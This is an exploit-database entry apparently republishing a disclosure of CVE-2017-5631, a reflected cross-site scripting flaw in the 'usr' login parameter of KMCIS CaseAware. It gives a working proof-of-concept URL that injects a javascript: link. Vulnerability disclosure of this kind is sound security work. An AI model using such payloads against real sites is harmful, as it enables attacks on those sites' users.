[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KMCIS CaseAware - Cross-Site Scripting Vulnerability

Author
justpentest
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-27814
Category
web applications
Date add
21-05-2017
CVE
CVE-2017-5631
Platform
php
# Exploit Title: CaseAware Cross Site Scripting Vulnerability
# Date: 20th May 2017
# Exploit Author: justpentest
# Vendor Homepage: https://caseaware.com/
# Version: All the versions
# Contact: transform2secure@gmail.com
# CVE : 2017-5631
 
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
 
1) Description:
An issue with respect to input sanitization was discovered in KMCIS
CaseAware. Reflected cross site scripting is present in the user parameter
(i.e., "usr") that is transmitted in the login.php query string. So
bascially username parameter is vulnerable to XSS.
 
2) Exploit:
 
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
----------------------------------------------------------------------------------------
 
3) References:
 
https://www.openbugbounty.org/incidents/228262/
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle

#  0day.today [2024-12-27]  #